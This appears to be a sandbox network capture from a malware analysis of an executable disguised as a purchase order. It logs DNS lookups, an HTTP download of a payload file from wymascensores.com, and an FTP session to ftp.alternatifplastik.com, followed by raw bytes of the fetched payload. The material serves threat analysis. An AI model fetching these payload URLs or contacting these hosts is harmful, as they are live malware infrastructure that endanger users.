                                                        Oct 7, 2024 09:13:52.771760941 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.771760941 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.771822929 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.771899939 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.772126913 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.772208929 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.772231102 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.772325993 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.772326946 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.772370100 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.772439957 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.790421963 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.790479898 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.790518045 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.790537119 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.790568113 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.790635109 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859083891 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859159946 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859190941 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859209061 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859253883 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859253883 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859323978 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859407902 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859596014 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859632969 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859683037 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859683037 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859692097 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859739065 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859769106 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859775066 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859817982 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859817982 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859874964 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859946966 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.859997988 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.859997988 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860004902 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860179901 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860219955 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860333920 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860394955 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860394955 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860403061 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860496044 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860502958 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860516071 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860565901 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860569954 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860578060 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860630035 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860630035 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860786915 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860857010 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860908985 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860908985 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.860915899 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.860964060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.879336119 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.879380941 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.879554987 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.879571915 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.879616022 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.879616022 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.947905064 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948076010 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948146105 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948146105 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948173046 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948206902 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948262930 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948262930 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948272943 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948329926 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948394060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948394060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948401928 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948445082 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948565960 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948626041 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948626041 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948637962 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948673010 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948796034 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948862076 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948862076 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948875904 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948920012 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.948982000 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948982000 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.948991060 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949033976 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949155092 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949155092 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949165106 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949300051 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949359894 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949359894 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949368954 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949398041 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949444056 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949444056 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949451923 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949533939 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949594021 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949594021 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949601889 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949695110 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949764013 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949764013 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.949771881 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.949969053 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.967717886 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.967859030 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.967917919 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.967947960 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.968000889 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.968000889 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.036478996 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.036634922 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.036760092 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.036788940 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.036788940 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.036804914 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.036839962 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.036914110 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037005901 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.037013054 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037064075 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037144899 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.037153959 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037199020 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037290096 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.037297964 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037316084 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037381887 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.037389040 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037681103 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.037765980 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.037774086 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.038595915 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.038686991 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.038696051 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.038712978 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.038820982 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.038829088 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.039567947 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.039627075 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.039633036 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.039673090 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:53.040249109 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:53.046176910 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:55.199930906 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:55.208364964 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:55.208436012 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:55.899801016 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:55.900016069 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:55.904870987 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.160398006 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.161016941 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:56.165858984 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.451302052 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.487454891 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:56.492357969 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.494283915 CEST4973521192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:56.747598886 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:56.747751951 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:56.752629042 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.007870913 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.008033037 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:57.012778997 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.268066883 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.268212080 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:57.274466991 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.529722929 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.530468941 CEST4974449640192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:57.535233974 CEST49640497445.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:57.535310030 CEST4974449640192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:57.535391092 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:57.540189981 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:58.222192049 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:58.222414017 CEST4974449640192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:58.222471952 CEST4974449640192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:58.227339029 CEST49640497445.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:58.227685928 CEST49640497445.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:58.227736950 CEST4974449640192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:58.271646976 CEST4974321192.168.2.45.2.84.236
                                                        Oct 7, 2024 09:13:58.482342005 CEST21497435.2.84.236192.168.2.4
                                                        Oct 7, 2024 09:13:58.537303925 CEST4974321192.168.2.45.2.84.236
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 7, 2024 09:13:30.930176973 CEST5060253192.168.2.41.1.1.1
                                                        Oct 7, 2024 09:13:31.134706020 CEST53506021.1.1.1192.168.2.4
                                                        Oct 7, 2024 09:13:35.070702076 CEST6255853192.168.2.41.1.1.1
                                                        Oct 7, 2024 09:13:35.235651016 CEST53625581.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 7, 2024 09:13:30.930176973 CEST192.168.2.41.1.1.10x7e6fStandard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:13:35.070702076 CEST192.168.2.41.1.1.10x4906Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 7, 2024 09:13:31.134706020 CEST1.1.1.1192.168.2.40x7e6fNo error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                                        Oct 7, 2024 09:13:35.235651016 CEST1.1.1.1192.168.2.40x4906No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                                        • wymascensores.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44973067.212.175.1624437096C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:13:32 UTC83OUTGET /index/Nbyrwv.dat HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:13:32 UTC183INHTTP/1.1 200 OK
                                                        Date: Mon, 07 Oct 2024 07:13:32 GMT
                                                        Server: Apache
                                                        Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 956424
                                                        Connection: close
                                                        2024-10-07 07:13:32 UTC8009INData Raw: 6e 68 47 45 2f 44 6a 64 87 22 5e 8c 9a 0f 6f b1 1b f9 d2 49 0c 2d 49 7c ab 8d 53 d1 70 06 f5 7a f6 f6 98 15 20 71 a0 71 34 1a a4 8c 09 40 86 30 62 dd cf bf 22 99 e3 04 49 e6 49 87 5e de 5c 2b 08 06 9f db 9e 9d 36 22 07 80 f4 81 c2 da 20 a8 de 97 f8 f1 5a f8 58 eb 3e 7c 7e cd dc 8a 6d bb 90 dc e9 60 63 4c ca 93 16 53 43 88 cc 21 57 27 20 b6 97 24 db 85 f5 dc ce b4 00 94 0c 17 7b d8 73 e6 d9 32 fe f8 27 be 63 b5 c8 b3 3a aa 72 31 62 ab 52 7f 3e 45 e2 d6 df 60 84 d0 65 42 fd 54 63 a1 c1 1e 5a ae 0b fe 62 eb a5 dd 9c dd 8b ca c7 b9 2a a0 72 f5 0c b2 03 b4 fa e2 cd 6a cf 1b 0f 63 b1 bf de f5 ac ab ae b4 f2 6d f8 cf 5a 88 cd b6 a1 a7 55 eb 10 f5 5c be 95 85 a1 38 7d 33 11 57 da af 98 34 4e aa fe 5c ba 7b 37 9d f2 27 f7 ef e2 23 20 15 01 43 bb 75 0d 80 51 26 4a
                                                        Data Ascii: nhGE/Djd"^oI-I|Spz qq4@0b"II^\+6" ZX>|~m`cLSC!W' ${s2'c:r1bR>E`eBTcZb*rjcmZU\8}3W4N\{7'# CuQ&J
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 0f a4 bc ef 14 1b 6b cd db ea 7e d5 d8 29 a2 b6 fc c5 23 30 1b 9b 19 c8 75 d7 79 fb 8e a9 a5 dd 6c 8d 8a a7 c6 7e a4 81 b7 65 a8 0c 9a c9 96 20 e9 05 ad 28 dd 20 31 a4 d5 0c 3e ee 1b 87 be 8a ee 34 43 c0 9a b7 1c 49 44 ec f4 75 73 15 f7 61 99 94 df db 78 9c 9f 7b 27 a7 6e 04 bf c3 22 5e bf 26 55 00 d2 7e b9 0e cd 34 96 66 82 d5 47 e1 83 2a cc ac a4 d5 03 67 f7 ac ec 1d b1 13 a6 c9 af fd f0 f2 10 3f 56 95 ca d4 8b 0e cb 99 8c e0 83 47 80 45 12 be 67 df 8b 11 55 d3 78 fc 30 3e 52 b6 e6 9d 48 4e d5 cc 12 a6 93 b5 cb 5d 54 28 7c ce a4 e5 a9 b8 1f 66 97 cb 4d a8 10 de ad b5 fb 41 bc 33 d1 20 e8 22 64 cd b5 7f 1a b3 84 5b 70 79 e3 31 e5 1e 59 2b 28 f4 f0 45 ee 9e e9 36 29 29 aa ce 19 d0 c9 3c 06 89 a7 db 0a d0 f0 63 7b 6a a0 6b 5c 64 dc 10 f4 b8 ad 73 6c c1 12
                                                        Data Ascii: k~)#0uyl~e ( 1>4CIDusax{'n"^&U~4fG*g?VGEgUx0>RHN]T(|fMA3 "d[py1Y+(E6))<c{jk\dsl
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 88 7c f2 ae 91 43 78 dd f1 66 12 6d 28 64 b5 49 87 b7 05 e7 ef 2d d8 29 46 20 9c 59 0f 62 df e8 6a f4 52 50 42 69 54 4c b1 76 93 af 6a 30 f9 7f 95 90 84 01 2b 22 dd 0c 3a d1 b5 cb 46 86 7d 50 87 df 47 99 19 da ab ab a1 26 43 9f 35 37 62 be a8 2d ff d1 da 8a fa 9b a6 2a 31 fb ed 27 6c fd 73 6d f3 25 96 72 71 ff e0 52 21 c2 3d 9c cb 85 1f 48 b5 f7 79 db f8 ad a1 2f d2 fb c1 ad 06 ba b2 c3 98 8c 83 28 04 f4 10 65 d2 cd 35 13 08 2d 00 9c 45 bc ec 08 ba 6c b0 95 0c d4 17 67 25 a8 2a db bb 58 eb 55 2e 7e 2e 54 a5 a0 75 2c c1 fa fe f6 1e 1e 16 f4 a6 f3 23 31 6a d6 39 08 0b 6f 6b c2 53 60 dd 6e c1 53 b7 ee ba 14 08 58 79 a9 a6 6c 75 11 fc 46 0d ea 7a 3d 4d 81 07 cb 8a 01 8a c4 9e b5 0e ca 76 49 ee 75 ca cc bb 3a 60 bc f8 5d 7b ca 96 33 92 bb ff 62 02 d1 16 23 a3
                                                        Data Ascii: |Cxfm(dI-)F YbjRPBiTLvj0+":F}PG&C57b-*1'lsm%rqR!=Hy/(e5-Elg%*XU.~.Tu,#1j9okS`nSXyluFz=MvIu:`]{3b#
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 35 df e7 e2 54 2e 40 25 56 25 0e 2b cb 27 76 fa 12 25 9a 06 16 bb 41 b6 84 b7 3a d9 33 bc d3 21 a4 e6 ec ac ae a1 34 9e a7 44 4b db c0 b2 5d bd 79 77 1c 22 7e 0a a9 ac 15 ca 11 52 8c e1 a9 d9 2c 8e c6 08 79 ce 50 ae 14 50 8a a7 91 0a 5b aa 3b de ad a1 24 b6 4a 0d 28 12 83 08 e6 70 99 1e 38 9a 8b 9a b0 04 dd 25 21 34 9f 94 c9 98 9b 2d fe 31 e0 21 8f 36 c7 3c 17 d9 20 4b 4d 02 42 2a 18 00 55 f1 91 03 8a 7e fe da b0 1a 93 27 3d 25 fc 13 6d 7b 04 28 67 77 aa 3a 86 b4 59 d7 bf b0 7f 9b 0e fe fd 32 5d 83 1b c3 13 f8 8f f5 97 c1 5a 86 af 7b 83 20 43 39 96 c4 8e f7 b2 94 e9 fc 33 97 08 b8 24 30 c9 dc f1 0f 9b 09 ad 92 b4 2b ac bb 59 45 bb 4b 45 3f 79 51 15 ef 9b b3 b4 dc 2e f4 50 d3 83 64 77 fd 3c ee 55 cc 98 5f aa b8 6a a3 2b ae 1d 0f f5 ac dc 5b 08 6e 6a 55 12
                                                        Data Ascii: 5T.@%V%+'v%A:3!4DK]yw"~R,yPP[;$J(p8%!4-1!6< KMB*U~'=%m{(gw:Y2]Z{ C93$0+YEKE?yQ.Pdw<U_j+[njU
                                                        2024-10-07 07:13:32 UTC8000INData Raw: f8 1f bf 66 e9 b1 94 f7 22 00 d6 5a 05 24 8d ea 70 88 6d b5 13 e7 d8 e4 03 fe 21 c3 37 53 17 83 01 48 13 4f b4 6d 8a 8b 6a 1d 31 bc fd fa eb 7c c2 3c e8 ae e9 9f 6b b1 7c 0d c3 6d d9 b1 97 9a de c7 f0 2f c9 6e 8f fc d1 dd d4 55 89 f0 99 1f 49 58 ce 2a 15 23 3e c4 26 08 9a b5 71 de b4 8c 47 e4 91 12 4c ec c2 96 0f 40 19 ad b5 a7 97 f6 2c ea a9 93 bd a2 b7 a8 c6 51 4f 93 62 c3 da 19 fe 72 82 51 6c b6 60 5b de 9b 0c 2a e9 d1 5d 90 27 c1 e8 51 ea 80 6b 34 f5 d1 4f 9f 34 7c 36 f7 02 c7 7d e4 65 b7 32 f7 aa 9c 08 aa de e5 fe b5 f0 ae 1b 74 40 63 5e cf de b1 2d ac eb 2c b5 72 ef 52 1f 37 06 92 f7 51 75 3e c6 46 07 7e d9 f2 cb 7b 54 9c b0 56 9c f3 eb ef db 3b b7 2f ee e4 94 b3 ec 80 63 5f 04 db fa d5 29 17 bf 95 20 0a 7f 6e f0 8e 44 d0 5c e7 44 cd ae 1e fa 6c e8
                                                        Data Ascii: f"Z$pm!7SHOmj1|<k|m/nUIX*#>&qGL@,QObrQl`[*]'Qk4O4|6}e2t@c^-,rR7Qu>F~{TV;/c_) nD\Dl
                                                        2024-10-07 07:13:32 UTC8000INData Raw: e5 2e 38 26 28 79 85 02 7c 66 c3 46 13 33 31 9a cc 0c 2d 11 3b 3d e8 b6 1f f7 3b 6b e0 89 9b d7 4b fd 7c eb 9d 2e f4 0e 54 d8 1b 76 40 c5 2e 3d 25 b9 61 e1 9c 83 11 09 56 ad e0 98 c1 00 11 71 36 ed e4 c1 e2 52 6c 61 08 80 04 bc d1 08 5c 26 02 ec 89 d4 36 b1 91 df c6 ed e1 5b f0 3f 8e 9c 89 42 32 43 a5 c0 04 bf 9e 31 40 b9 0a f6 eb f9 bc c0 82 ce 44 df 6d e3 7e 6d f5 fb c3 f8 51 f8 93 cd 92 98 e1 75 b9 56 fb c6 95 29 48 80 38 e9 32 23 92 58 25 38 e8 ca c9 3e 1e c6 a6 b5 13 54 6f 84 73 0a eb 24 64 73 40 9e 61 54 a1 60 cb 27 d1 8d 4a c9 71 92 63 a0 a4 08 21 21 64 cc 9e 3b 6d 00 2f 8f ff 75 7a 48 48 08 93 4f 37 58 44 9c 87 b6 b0 54 a5 5a c2 6a 9d 0c 76 83 82 0d a7 66 04 61 18 05 06 e8 bd de 91 7e f1 67 1b dc 6b 8d 19 38 e3 2c 27 b4 5f 1a d2 f8 55 1e c2 1a fb
                                                        Data Ascii: .8&(y|fF31-;=;kK|.Tv@.=%aVq6Rla\&6[?B2C1@Dm~mQuV)H82#X%8>Tos$ds@aT`'Jqc!!d;m/uzHHO7XDTZjvfa~gk8,'_U
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 39 3f 25 16 f0 f1 87 af bd 57 6b 0a 7b ab e3 32 f9 7d b7 11 32 e0 34 a6 e1 3b 92 ad f3 9a 37 71 4a 3c 2a aa 03 74 61 08 ae a7 61 ad 14 b2 b5 41 2f 7d ba 39 5f 61 38 b2 38 20 0c 3d e8 34 f8 b8 a4 fc 00 4a 8b d6 d8 b8 4b 02 a4 1d c9 c0 63 be e4 12 fa 8e 4c 23 bf ba 8c 1c 82 61 6f 80 a6 4c 62 72 6a 50 7a 6a cc 06 5d 81 5b 66 ea 82 4d b3 4e b6 14 63 7e 27 84 69 7e 6d 71 7e ef 43 43 e3 17 af b1 e8 c9 95 2f 63 9d fb 2c bb 70 9d 2d 38 b3 4b 07 e2 7a ae 89 9e d4 fc 7b 74 e2 18 68 af 43 e0 5e a5 b4 67 cc 36 c5 08 03 35 ca 78 2e cf f4 9e 08 1a a4 09 41 95 18 4d 12 45 02 21 12 5e 0f ec 3e dd 52 22 1d a4 2f ef 31 dc 75 4a dc fa 01 f4 13 ef 7b 44 20 f6 22 c4 f4 d1 21 68 31 a4 ca 13 6a fe 57 84 2e 56 51 77 6b 37 04 c3 01 06 3e a7 70 93 67 d5 44 1e 93 43 5e de 49 1d 46
                                                        Data Ascii: 9?%Wk{2}24;7qJ<*taaA/}9_a88 =4JKcL#aoLbrjPzj][fMNc~'i~mq~CC/c,p-8Kz{thC^g65x.AME!^>R"/1uJ{D "!h1jW.VQwk7>pgDC^IF
